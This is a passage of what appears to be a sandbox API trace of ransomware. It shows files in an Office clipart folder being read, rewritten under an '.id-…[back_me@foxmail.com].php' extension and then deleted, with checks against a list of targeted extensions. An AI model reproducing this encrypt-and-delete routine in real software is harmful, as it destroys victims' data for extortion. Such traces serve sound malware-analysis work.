SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.284] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0263.284] GetLastError () returned 0x0 [0263.284] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x610c, lpOverlapped=0x0) returned 1 [0263.408] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x6110, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x6110, lpOverlapped=0x0) returned 1 [0263.409] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.409] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.409] SetEndOfFile (hFile=0x37c) returned 1 [0263.409] CloseHandle (hObject=0x37c) returned 1 [0263.409] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.409] SetEndOfFile (hFile=0x38c) returned 1 [0263.412] CloseHandle (hObject=0x38c) returned 1 [0263.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.415] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf")) returned 1 [0263.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.416] lstrlenW (lpString=".doc") returned 4 [0263.416] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.416] lstrlenW (lpString=".docx") returned 5 [0263.416] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0263.416] lstrlenW (lpString=".pdf") returned 4 [0263.416] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.416] lstrlenW (lpString=".xls") returned 4 [0263.416] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.416] lstrlenW (lpString=".xlsx") returned 5 [0263.416] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0263.416] lstrlenW (lpString=".ppt") returned 4 [0263.416] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.416] lstrlenW (lpString=".zip") returned 4 [0263.416] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.416] lstrlenW (lpString=".rar") returned 4 [0263.416] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.416] lstrlenW (lpString=".bz2") returned 4 [0263.416] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.416] lstrlenW (lpString=".7z") returned 3 [0263.416] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.416] lstrlenW (lpString=".dbf") returned 4 [0263.416] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.416] lstrlenW (lpString=".1cd") returned 4 [0263.416] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.416] lstrlenW (lpString=".jpg") returned 4 [0263.417] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.417] lstrlenW (lpString=".doc") returned 4 [0263.417] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString=".docx") returned 5 [0263.417] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0263.417] lstrlenW (lpString=".pdf") returned 4 [0263.417] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString=".xls") returned 4 [0263.417] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.417] lstrlenW (lpString=".xlsx") returned 5 [0263.417] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0263.417] lstrlenW (lpString=".ppt") returned 4 [0263.417] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.417] lstrlenW (lpString=".zip") returned 4 [0263.417] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.417] lstrlenW (lpString=".rar") returned 4 [0263.417] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString=".bz2") returned 4 [0263.417] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString=".7z") returned 3 [0263.417] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.417] lstrlenW (lpString=".dbf") returned 4 [0263.417] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.417] lstrlenW (lpString=".1cd") returned 4 [0263.417] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63 [0263.417] lstrlenW (lpString=".jpg") returned 4 [0263.417] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.418] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.418] lstrlenW (lpString="J0152436.WMF") returned 12 [0263.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0263.418] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=11340) returned 1 [0263.418] CloseHandle (hObject=0x3e8) returned 1 [0263.418] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf")) returned 0x20 [0263.418] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0263.418] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.418] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0263.419] GetLastError () returned 0x0 [0263.420] ReadFile (in: hFile=0x3e8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2c4c, lpOverlapped=0x0) returned 1 [0263.432] WriteFile (in: hFile=0x3b8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2c50, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2c50, lpOverlapped=0x0) returned 1 [0263.433] ReadFile (in: hFile=0x3e8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.433] WriteFile (in: hFile=0x3b8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.433] SetEndOfFile (hFile=0x3b8) returned 1 [0263.433] CloseHandle (hObject=0x3b8) returned 1 [0263.433] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.433] SetEndOfFile (hFile=0x3e8) returned 1 [0263.435] CloseHandle (hObject=0x3e8) returned 1 [0263.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.435] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf")) returned 1 [0263.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.436] lstrlenW (lpString=".doc") returned 4 [0263.436] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.436] lstrlenW (lpString=".docx") returned 5 [0263.436] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0263.436] lstrlenW (lpString=".pdf") returned 4 [0263.436] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.436] lstrlenW (lpString=".xls") returned 4 [0263.436] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.436] lstrlenW (lpString=".xlsx") returned 5 [0263.436] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0263.436] lstrlenW (lpString=".ppt") returned 4 [0263.436] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.436] lstrlenW (lpString=".zip") returned 4 [0263.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.436] lstrlenW (lpString=".rar") returned 4 [0263.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.436] lstrlenW (lpString=".bz2") returned 4 [0263.436] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.436] lstrlenW (lpString=".7z") returned 3 [0263.436] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.436] lstrlenW (lpString=".dbf") returned 4 [0263.436] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.436] lstrlenW (lpString=".1cd") returned 4 [0263.436] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.436] lstrlenW (lpString=".jpg") returned 4 [0263.436] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.437] lstrlenW (lpString=".doc") returned 4 [0263.437] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.437] lstrlenW (lpString=".docx") returned 5 [0263.437] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0263.437] lstrlenW (lpString=".pdf") returned 4 [0263.437] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.437] lstrlenW (lpString=".xls") returned 4 [0263.437] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.437] lstrlenW (lpString=".xlsx") returned 5 [0263.437] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0263.437] lstrlenW (lpString=".ppt") returned 4 [0263.437] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.437] lstrlenW (lpString=".zip") returned 4 [0263.437] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.437] lstrlenW (lpString=".rar") returned 4 [0263.437] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.437] lstrlenW (lpString=".bz2") returned 4 [0263.437] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.437] lstrlenW (lpString=".7z") returned 3 [0263.437] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.437] lstrlenW (lpString=".dbf") returned 4 [0263.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.438] lstrlenW (lpString=".1cd") returned 4 [0263.438] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63 [0263.438] lstrlenW (lpString=".jpg") returned 4 [0263.438] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.438] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.438] lstrlenW (lpString="J0152558.WMF") returned 12 [0263.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0263.438] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=16052) returned 1 [0263.438] CloseHandle (hObject=0x3e8) returned 1 [0263.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf")) returned 0x20 [0263.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0263.439] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.439] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0263.439] GetLastError () returned 0x0 [0263.439] ReadFile (in: hFile=0x3e8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x3eb4, lpOverlapped=0x0) returned 1 [0263.454] WriteFile (in: hFile=0x3b8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x3ec0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x3ec0, lpOverlapped=0x0) returned 1 [0263.455] ReadFile (in: hFile=0x3e8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.455] WriteFile (in: hFile=0x3b8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.456] SetEndOfFile (hFile=0x3b8) returned 1 [0263.456] CloseHandle (hObject=0x3b8) returned 1 [0263.456] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.456] SetEndOfFile (hFile=0x3e8) returned 1 [0263.458] CloseHandle (hObject=0x3e8) returned 1 [0263.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf")) returned 1 [0263.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.458] lstrlenW (lpString=".doc") returned 4 [0263.458] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.458] lstrlenW (lpString=".docx") returned 5 [0263.458] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0263.458] lstrlenW (lpString=".pdf") returned 4 [0263.458] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.458] lstrlenW (lpString=".xls") returned 4 [0263.458] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.458] lstrlenW (lpString=".xlsx") returned 5 [0263.459] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0263.459] lstrlenW (lpString=".ppt") returned 4 [0263.459] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.459] lstrlenW (lpString=".zip") returned 4 [0263.459] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.459] lstrlenW (lpString=".rar") returned 4 [0263.459] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString=".bz2") returned 4 [0263.459] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString=".7z") returned 3 [0263.459] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.459] lstrlenW (lpString=".dbf") returned 4 [0263.459] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.459] lstrlenW (lpString=".1cd") returned 4 [0263.459] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.459] lstrlenW (lpString=".jpg") returned 4 [0263.459] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.459] lstrlenW (lpString=".doc") returned 4 [0263.459] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString=".docx") returned 5 [0263.459] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0263.459] lstrlenW (lpString=".pdf") returned 4 [0263.459] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.459] lstrlenW (lpString=".xls") returned 4 [0263.459] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.459] lstrlenW (lpString=".xlsx") returned 5 [0263.459] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0263.460] lstrlenW (lpString=".ppt") returned 4 [0263.460] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.460] lstrlenW (lpString=".zip") returned 4 [0263.460] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.460] lstrlenW (lpString=".rar") returned 4 [0263.460] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.460] lstrlenW (lpString=".bz2") returned 4 [0263.460] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.460] lstrlenW (lpString=".7z") returned 3 [0263.460] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.460] lstrlenW (lpString=".dbf") returned 4 [0263.460] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.460] lstrlenW (lpString=".1cd") returned 4 [0263.460] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63 [0263.460] lstrlenW (lpString=".jpg") returned 4 [0263.460] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.460] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.460] lstrlenW (lpString="J0152570.WMF") returned 12 [0263.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0263.499] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=3368) returned 1 [0263.499] CloseHandle (hObject=0x3c0) returned 1 [0263.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf")) returned 0x20 [0263.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0263.499] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.499] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.500] GetLastError () returned 0x0 [0263.500] ReadFile (in: hFile=0x3c0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, 